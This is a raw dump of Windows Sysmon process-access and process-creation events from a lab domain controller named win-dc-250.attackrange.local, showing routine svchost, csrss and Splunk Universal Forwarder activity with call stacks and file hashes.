13:43:15.943{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014350Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:15.943{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014349Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:15.943{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014348Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:15.943{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4A73-6000-9405-000000009A01}1384C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014347Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:15.943{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4A73-6000-9405-000000009A01}1384C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014346Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:15.944{08A6967A-4A73-6000-9405-000000009A01}1384C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000014345Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:15.271{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4A73-6000-9305-000000009A01}6716C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014344Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:15.271{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014343Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:15.271{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014342Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:15.271{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014341Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:15.271{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014340Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:15.271{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4A73-6000-9305-000000009A01}6716C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014339Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:15.271{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4A73-6000-9305-000000009A01}6716C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014338Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:15.272{08A6967A-4A73-6000-9305-000000009A01}6716C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000014362Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:16.615{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4A74-6000-9505-000000009A01}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014361Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:16.615{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014360Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:16.615{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014359Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:16.615{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014358Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:16.615{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014357Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:16.615{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4A74-6000-9505-000000009A01}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014356Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:16.615{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4A74-6000-9505-000000009A01}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014355Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:16.616{08A6967A-4A74-6000-9505-000000009A01}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000014354Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:16.099{08A6967A-4A73-6000-9405-000000009A01}13846816C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014371Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:17.677{08A6967A-4A75-6000-9605-000000009A01}67726588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014370Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:17.521{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4A75-6000-9605-000000009A01}6772C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014369Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:17.521{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014368Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:17.521{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014367Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:17.521{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014366Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 